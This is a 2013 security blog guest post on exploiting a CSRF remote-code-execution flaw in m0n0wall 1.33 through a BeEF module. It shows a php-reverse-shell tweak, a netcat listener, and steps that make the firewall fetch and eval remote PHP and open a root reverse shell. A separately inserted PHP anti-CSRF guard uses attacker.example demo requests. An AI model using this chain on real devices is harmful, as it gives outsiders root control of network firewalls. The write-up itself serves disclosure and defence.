Wednesday, March 20, 2013

Exploiting m0n0wall 1.33 with BeEF

Today's post is a guest post from Bart Leppens.

What is m0n0wall? m0n0wall is a free software firewall distribution that often runs on embedded hardware like Alix or Soekris boards. It is based on a bare-bones version of FreeBSD. There is no netcat, socat, perl, python, ruby or even telnet present on the system. I actually don't know if this is due to security considerations or just to save some disk space, since m0n0wall for a long time fit on an 8 MB CF card and now requires just a 16 MB card. And we figured out how to exploit it with BeEF.

The Proof of Concept:
In November of 2012, Yann Cam, Security Consultant at synetis, released a Cross-Site Request Forgery (CSRF) Remote Code Execution (RCE) Proof of Concept for m0n0wall 1.33 which allows an attacker to spawn a reverse shell with root privileges.

On the m0n0wall website the following news item is posted:

m0n0wall Vulnerability Announcement

Oh my, CSRF RCE with root privileges on a router is considered a low priority security fix nowadays...

Anyway, to obtain his root shell, Yann Cam made use of Pentest Monkey's php-reverse-shell.  We at BeEF-project decided to contact Pentest Monkey and asked him if we were allowed to tweak his awesome php reverse shell just a tiny bit so we could use it with an automatic module for Yann's exploit.

So I basically just changed this:

$ip = '';  // CHANGE THIS
$port = 1234;       // CHANGE THIS

into this:

$ip = $_GET["ip"];      // retrieve ip address to connect back to via HTTP GET
if (!$ip) {
    $ip = '';           // or set static ip address
}
$port = $_GET["port"];  // retrieve port to connect back to via HTTP GET
if (!$port) {
    $port = 1234;       // or define port here
}

Then I just implemented the actual BeEF-module based on the provided proof of concept so m0n0wall 1.33 can be easily exploited.

What happens behind the scenes?
  1. The victim needs to have a valid m0n0wall-session for the CSRF to work.
  2. An attacker needs to listen on some port (lport) at a certain IP address (lhost)  (e.g.: nc -l -p 4444).
  3. The attacker fills in the parameters in BeEF and sends the exploit to http://lhost:lport/exec_raw.php
  4. The file php-reverse-shell.php gets served by BeEF.
  5. A new file x.php is created on the victim's machine and given proper execute rights (chmod 755).
  6. After a little bit, http://lhost:lport/x.php?ip=<rhost>&port=<rport> is triggered.
  7. The remotely served file http://beefhost:beefport/php-reverse-shell.php gets eval'ed. (For it to work, make sure you have configured your public host in BeEF's config.yaml. Otherwise, your IP might be known as and it won't work.)
  8. The m0n0wall machine spawns back a reverse shell to specified lhost and lport.
  9. Finally, BeEF stops serving the php-reverse-shell.php.
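The chain above works only because a privileged webGUI action can be triggered by any page the victim's browser loads while a valid m0n0wall session exists. The following is an added example of the guard such an action needs, written here as illustration; it is not m0n0wall's or BeEF's code. The endpoint name exec_raw.php comes from the steps above, while the host name fw.example.internal, the attacker.example origin and the array parameters standing in for $_SESSION, $_SERVER and $_POST are assumptions so that it runs from the PHP CLI.

```php
<?php
// Added example, not m0n0wall's own code: a generic anti-CSRF guard for a
// privileged webGUI action such as exec_raw.php. Two checks are combined:
// the request must come from our own origin, and it must carry a per-session
// secret that a cross-site page cannot read. $session/$server/$post stand in
// for $_SESSION/$_SERVER/$_POST; the host names are constructed for the demo.

// Issue one unguessable token per session and embed it in every admin form.
function csrf_token(array &$session): string {
    if (empty($session['csrf_token'])) {
        $session['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $session['csrf_token'];
}

// Decide whether a state-changing request may proceed.
function csrf_request_allowed(array $session, array $server, array $post, string $own_host): bool {
    // A GET must never trigger a privileged action; the CSRF described in
    // the post works precisely because a simple cross-site GET was enough.
    if (($server['REQUEST_METHOD'] ?? '') !== 'POST') {
        return false;
    }
    // Origin (or, failing that, Referer) must name our own host.
    $source = $server['HTTP_ORIGIN'] ?? $server['HTTP_REFERER'] ?? '';
    $host = parse_url($source, PHP_URL_HOST);
    if (!is_string($host) || strcasecmp($host, $own_host) !== 0) {
        return false;
    }
    // The submitted token must match the session token (constant-time compare).
    if (empty($session['csrf_token']) || !isset($post['csrf_token'])) {
        return false;
    }
    return hash_equals($session['csrf_token'], (string) $post['csrf_token']);
}

// --- constructed demonstration ---------------------------------------------
$session = [];
$token   = csrf_token($session);
$ownHost = 'fw.example.internal';

// 1. The forged request from the write-up: a cross-site GET carrying no token.
$forged = csrf_request_allowed(
    $session,
    ['REQUEST_METHOD' => 'GET', 'HTTP_REFERER' => 'http://attacker.example/lure.html'],
    [],
    $ownHost
);

// 2. A cross-site POST that supplies the parameter name but not the secret.
$crossPost = csrf_request_allowed(
    $session,
    ['REQUEST_METHOD' => 'POST', 'HTTP_ORIGIN' => 'http://attacker.example'],
    ['csrf_token' => 'guess'],
    $ownHost
);

// 3. The administrator's own form submission from the webGUI.
$legit = csrf_request_allowed(
    $session,
    ['REQUEST_METHOD' => 'POST', 'HTTP_ORIGIN' => 'http://fw.example.internal'],
    ['csrf_token' => $token],
    $ownHost
);

var_dump($forged, $crossPost, $legit);
```

The session token is the primary control: a page on another origin can make the browser send the admin cookie, but it cannot read the token out of the form. The Origin/Referer comparison is a second layer that costs nothing to add, but it must not replace the token, because some clients and proxies strip both headers and an empty value is rejected here rather than trusted.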

So even with only the PHP interpreter present on the system, it can still be possible to obtain a reverse shell without the need to compile code or to execute shellcode. By using creative solutions like Pentest Monkey's php-reverse-shell, you can still easily exploit the remote system.

Bart Leppens has a master's degree in Informatics. He has over 10 years of experience in IT, mainly in software development. He has reported security bugs in widely used products from major vendors. At the moment, he is working as a Project Manager for the Belgian government at the department of Finances. During his spare time he likes to contribute to the BeEF-project. You can reach him via twitter: @bmantra


  1. Just deploying an important message:
    while installing BeEF exactly as shown I encountered an error in the "Bundle Install".

    Bundler::GemSpecError: Could not read gem at /home//.rvm/gems/ruby-1.9.2-p290-rub/cache/librex-0.0.68.gem. It may be corrupted.
    An error occurred while installing librex (0.0.68), and Bundler cannot continue.
    Make sure that 'gem install librex -v '0.0.68'' succeeds before bundling.

    When I tried running BeEF I got:
    Could not find gem 'twitter (>= 0) ruby' in the gems available on this machine.
    Run 'bundle install' to install missing gems.

    OK so now for the solution that took me a few Google hours:

    The problem seems to stop the gem installation, and the 'twitter gem' is next after librex. That's why the error on exec is 'twitter gem' related.

    The error is referring to ruby's cache directory:
    "Could not read gem at /home//.rvm/gems/ruby-1.9.2-p290-rub/CACHE/librex-0.0.68.gem. It may be corrupted."

    So all you need to do is delete the cache directory by:
    user@ubuntu: rm -r cache
    user@ubuntu: bundle install

    Enjoy BeEF!
